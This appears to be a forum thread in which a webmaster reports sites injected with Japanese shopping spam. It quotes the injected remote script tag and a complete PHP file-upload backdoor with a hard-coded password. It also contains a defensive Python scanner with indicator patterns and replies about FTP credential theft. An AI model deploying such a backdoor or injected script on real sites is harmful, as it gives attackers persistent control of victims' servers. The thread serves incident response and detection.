Websites hacked

BluJag

Perch
All my sites on Web4 have been hacked by a Japanese shopping organisation. I'm in the long process of trying to delete the thousands and thousands of files which have been uploaded.

This is a snippet from one of the HTML files:

<script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>shop/item/3390.html"

and

<dd><a href="http://www.mungaz.net/engine/eX0-Spring-short-coat-U7.html">Mila Owen 無地衿付きニットトップス ミラオーウェン</a></dd>

and

<div class=copyright>
<div class=inner>
<div class=policy> <a href="http://www.orbis.co.jp/contents/company/privacy/">個人情報保護方針</a><span>|</span><a href="/snspolicy/">ソーシャルメディアポリシー</a> </div>
<p> <img src="http://www.orbis.co.jp/contents/images/foot/2015copyright.png" alt="copyright © 1999-2015 orbis inc. all rights reserved." width=266 height=11><img src="http://www.orbis.co.jp/contents/images/foot/footer_logo.gif" alt=orbis width=43 height=16 class=footlogo><br>
</p>
</div>
</div>

Plus there are PHP files too, e.g.:

$config_password="yt";                 // hard-coded password the uploader expects
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];   // target folder under the web root, or "root"
$filename=$_REQUEST['filename'];       // name of the file to drop
$body=stripslashes($_REQUEST['body']); // file content supplied in the request

if($password==""||$filename==""||$body=="")
{
echo 'parameters error!';
return;
}

if($password!=$config_password)
{
echo 'password error!';
return;
}

$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;

if($folderpath!="")
{
if($folderpath=="root")
{
$newPath=$rootPath.'/'.$filename;
}
else
{
createFolder($rootPath.'/'.$folderpath);
$newPath=$rootPath.'/'.$folderpath.'/'.$filename;
}
}
else
{
$newPath=$filename;
}


$fp=fopen($newPath,"w");               // request-supplied content written straight to disk
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);

if(file_exists($newPath))
{
echo "publish success & uploaded";
}

function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);                    // recursively creates world-writable directories
}
}

Suggest everyone checks their own sites!
 
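A quick way to find this kind of defacement across a web root is to scan for the indicators quoted in the post: the injected remote script tag, the spam link domain, and PHP files that write a request parameter straight to disk (the shape of the uploader script above). The following Python script is an added example written for this thread, not code from BluJag's site or from Web4; the indicator list and the source-to-sink heuristic are assumptions for illustration, not a maintained signature set, and the sample web root it builds is constructed.

```python
"""Heuristic scanner for the defacement pattern described in the thread.

Added example: walks a web root, flags HTML/PHP files carrying the injected
remote script tag or the spam link domain quoted in the post, and flags PHP
files where request-controlled input reaches a file-write sink. The indicator
strings come from the thread; the write-sink heuristic is an assumption.
"""
import os
import re
import tempfile
from pathlib import Path

# Strings lifted from the hacked files quoted in the thread.
HTML_INDICATORS = {
    "remote script iclothesshow.top": re.compile(
        r"<script[^>]*\bsrc=['\"]https?://iclothesshow\.top/", re.I),
    "spam link mungaz.net": re.compile(r"https?://(www\.)?mungaz\.net/", re.I),
}

# Request-controlled input reaching a file-write sink is the tell-tale of a
# drop-file uploader like the one posted (heuristic, will have false positives).
REQUEST_SOURCE = re.compile(r"\$_(?:REQUEST|POST|GET)\s*\[")
WRITE_SINKS = re.compile(r"\b(?:fwrite|file_put_contents|fputs)\s*\(")
WORLD_WRITABLE_MKDIR = re.compile(r"\bmkdir\s*\([^)]*0777")


def classify(name: str, text: str) -> list:
    """Return the reasons a file looks injected or malicious (empty if clean)."""
    reasons = []
    suffix = Path(name).suffix.lower()
    if suffix in {".html", ".htm", ".php", ".phtml"}:
        for label, pattern in HTML_INDICATORS.items():
            if pattern.search(text):
                reasons.append(label)
    if suffix in {".php", ".phtml"}:
        if REQUEST_SOURCE.search(text) and WRITE_SINKS.search(text):
            reasons.append("request parameter written to disk (uploader shell)")
        if WORLD_WRITABLE_MKDIR.search(text):
            reasons.append("creates world-writable directory")
    return reasons


def scan_tree(root: str) -> dict:
    """Walk root and map each suspicious file (relative, '/'-separated) to its reasons."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                text = Path(full).read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            reasons = classify(fn, text)
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings


def build_sample_webroot() -> str:
    """Create a throwaway web root with constructed clean and injected files."""
    root = tempfile.mkdtemp(prefix="webroot-")
    Path(root, "index.html").write_text("<html><body>Hello</body></html>")
    Path(root, "shop").mkdir()
    # Constructed injected page modelled on the snippets quoted in the post.
    Path(root, "shop", "3390.html").write_text(
        '<script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>'
        '<dd><a href="http://www.mungaz.net/engine/x.html">spam</a></dd>')
    # Constructed uploader with the same source-to-sink shape as the posted PHP.
    Path(root, "up.php").write_text(
        "<?php $b=$_REQUEST['body']; $fp=fopen($_REQUEST['filename'],'w'); "
        "fwrite($fp,$b); mkdir($p, 0777);")
    # Legitimate form handler: reads a request parameter but never writes a file.
    Path(root, "contact.php").write_text(
        "<?php $name=$_POST['name']; echo htmlspecialchars($name);")
    return root


if __name__ == "__main__":
    for path, reasons in sorted(scan_tree(build_sample_webroot()).items()):
        print(f"{path}: {', '.join(reasons)}")
```

Run it against the real document root instead of the sample tree by calling scan_tree("/path/to/webroot"); anything it flags should be reviewed by hand, since a legitimate upload handler also reads a request parameter and writes a file. Pair the scan with the FTP password change and workstation clean-up suggested in the replies below, otherwise the files will simply come back.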
Seems an iframe script was added to your domain web files. There are many ways this can happen; most are due to a stolen FTP password. It doesn't come from your PC, but the gumblar worm steals it from your PC and it is later used via FTP to infect your pages. We recommend you scan all computers that have FTP access to this account, or have had access to it in the past. This is to be done until an infection is found and cleaned. Also, change the password of the main and the sub-FTP accounts.
 
That PHP file likely got uploaded and then they did the rest via that, making it much harder to find the real source since it will be hidden in just a single line, and then used via the website by many botnets to upload.
 